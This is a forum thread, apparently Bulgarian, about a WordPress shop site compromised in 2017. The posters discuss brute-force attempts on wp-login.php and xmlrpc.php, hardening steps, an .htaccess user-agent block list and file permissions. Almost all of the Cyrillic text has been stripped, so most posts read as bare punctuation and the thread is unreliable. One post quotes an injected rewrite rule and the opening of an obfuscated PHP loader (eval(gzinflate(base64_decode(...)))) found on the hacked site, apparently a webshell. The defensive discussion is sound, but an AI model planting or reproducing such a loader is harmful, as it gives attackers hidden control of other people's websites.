Results 1 to 15 of 15

Thread: Wordpress

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    the system controls you MegatroniC's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 3,566

    Wordpress

    , - - .

    , woocommerce. , , wordpress. 4.6.7. , - 4.7.2, .
    , , , (4.8.1) ..., .

    , , ( ). , (), , . , - 12 . , ( ), . .
    , brute force /xmlrpc.php /wp-login.php

    . .

    , , .
    , , .
    ...

  2. #2
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    wordpress, '', -! global , "" "" , () ..., 5-6 .
    .

    (. ) login, 5 . ....
    , login, ( 12 )?

  3. #3
    geek skrubalov's Avatar
    Join Date: Jan:2009
    Location:
    Posts: 769
    , . phpmail WP.
    6-7 .
    :
    .htaccess

    ( https://www.smashingmagazine.com/201...ns-ownerships/ )

    !

    - - .

  4. #4
    the system controls you MegatroniC's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 3,566
    1- .
    cPanel .
    , /xmlrpc.php /wp-login.php.

    .
    - Wordpress
    - Wordpress.
    readme.html, license.txt, wp-config-sample.php
    - Login Lockdown 5 IP, 5 .
    180 .
    - "honeypot" () , .
    - 404
    - Trace Track
    - 6G/5G blacklist
    -
    - -
    - wp-config.php wodpress
    - wp-config.php public-html,
    - wp-admin.php e .htaccess IP
    - .htaccess public-html Script Injections, xmlrpc.php

    - ,

    <IfModule mod_setenvif.c>
    SetEnvIfNoCase User-Agent ^$ keep_out
    SetEnvIfNoCase User-Agent (casper|cmsworldmap|diavol|dotbot) keep_out
    SetEnvIfNoCase User-Agent (flicky|ia_archiver|jakarta|kmccrew) keep_out
    SetEnvIfNoCase User-Agent (purebot|comodo|feedfinder|planetwork) keep_out
    SetEnvIfNoCase User-Agent (libwww|planetwork|pycurl|skygrid) keep_out
    SetEnvIfNoCase User-Agent (purebot|comodo|feedfinder|turnit) keep_out
    SetEnvIfNoCase User-Agent (zmeu|nutch|vikspider|binlar|sucker) keep_out
    <Limit GET POST PUT>
    Order Allow,Deny
    Allow from all
    Deny from env=keep_out
    </Limit>
    </IfModule>
    - , ,

    , 26 .
    wordpress (/wp-login), admin.
    Brute Force /wp-login.php admin , , .
    , . ip- .
    , , .
    .

    , wordpress , . , .


    phpmail WP.
    ?



    Name File/Folder Current Permissions Recommended Permissions
    root directory /public_html/ 0755 0755 No Action Required
    wp-includes/ /public_html/wp-includes 0755 0755 No Action Required
    .htaccess /public_html/.htaccess 0644 0644 No Action Required
    wp-admin/index.php /public_html/wp-admin/index.php 0644 0644 No Action Required
    wp-admin/js/ /public_html/wp-admin/js/ 0755 0755 No Action Required
    wp-content/themes/ /public_html/wp-content/themes 0755 0755 No Action Required
    wp-content/plugins/ /public_html/wp-content/plugins 0755 0755 No Action Required
    wp-admin/ /public_html/wp-admin 0755 0755 No Action Required
    wp-content/ /public_html/wp-content 0755 0755 No Action Required
    wp-config.php /wp-config.php 0644 0644 No Action Required
    Last edited by MegatroniC; 7th August 2017 at 13:11.
    , , .
    ...

  5. #5
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    .
    , , FTP , mysql , / ( ) .

  6. #6
    Registered User rumenchooo's Avatar
    Join Date: Nov:2008
    Location: HOME
    Posts: 239
    detectify

    .

    /xmlrpc.php webserver-a (403 Forbidden) ( )

    wp-login.php Rename wp-login.php .

    wp-login.php (90 % )
    Last edited by rumenchooo; 7th August 2017 at 15:00.

  7. #7
    geek skrubalov's Avatar
    Join Date: Jan:2009
    Location:
    Posts: 769
    1. . ( 3:34 , , )
    2. htaccess " RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.jpds$ new.php?$1=$2-$3 [L] " ??
    3. "eval(gzinflate(base64_decode(' " ( " <?php
    @error_reporting(0);
    @set_time_limit(0);
    eval(gzinflate(base64_decode('5b1rV9vIEi j6OXut/R86Gu+RPTHGNkkmMZhACCQQAhmeeZDjkW3ZVpAtj SRjSIb/fqqqH2q9jElm77PuumQF7O7q6upXdXV1dVXJmkaj jm+F4cwL+qzNDGP13/8q9TzXC/DbL/3BE0rp2wNr6kYdqxc53gSyzB3HtcN31sTUs6eh3b G+WtcAEAVTW8/qjawgtCMseu5M+t4sXGo0nzSw+L//5QzKD+2xH92US53j7aOz7aPP5puTk/edU/jW2Xy9fXBifqlU2Pd//4vBTwnqCTaH9iQKAZ8VBNZN2XjteUPXNqrMOHang Y8f3h0fvPQi/ORYHSvojZwrO8CvH61J377GT0fWuOtCYmWVowZK/MAedsZW1BuVzWWT1Zgz9l2vb5fNv82qXncF8sxlB xMXoRp/RrbVt4MygS03anX2uP6YHXgR2/Gmk74pqcAf+9qJxNfbf//rFrtpI7TDEPq/E0ZWEJUResOZOB3o17JpB4EXdFxvaFYPTvf3k5mQ 3CGA0KzWk1lj67pjX9u9KY5sJ3LGtgSBb... "

    , 15 2016 17 2017 ( ). .

    :
    1. ? , , .. ?
    - - .

  8. #8
    the system controls you MegatroniC's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 3,566
    @ skrubalov, , cPanel-a . . .. , .

    htaccess , - , .


    3. "eval(gzinflate(base64_decode('
    , , php .

    :
    1. ? , , .. ?
    .



    Quote Originally Posted by tedych View Post
    .
    , , FTP , mysql , / ( ) .
    , , .
    , .
    , ...

    Quote Originally Posted by rumenchooo View Post
    . .

    Quote Originally Posted by rumenchooo View Post
    /xmlrpc.php webserver-a (403 Forbidden) ( )
    wp-login.php Rename wp-login.php .
    wp-login.php (90 % )
    .




    :

    ip: 46.119.112.177
    : - /products/ /
    : 8/7/17, 3:06 PM
    : 1139
    URL : chatr0ulette.v1de0/ ( , )

    , public_html, /9288
    , ip- .

    . , .
    , , .
    ...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Copyright © 1999-2011 . .
iskamPC.com | mobility.BG | Bloody's Techblog | | 3D Vision Blog |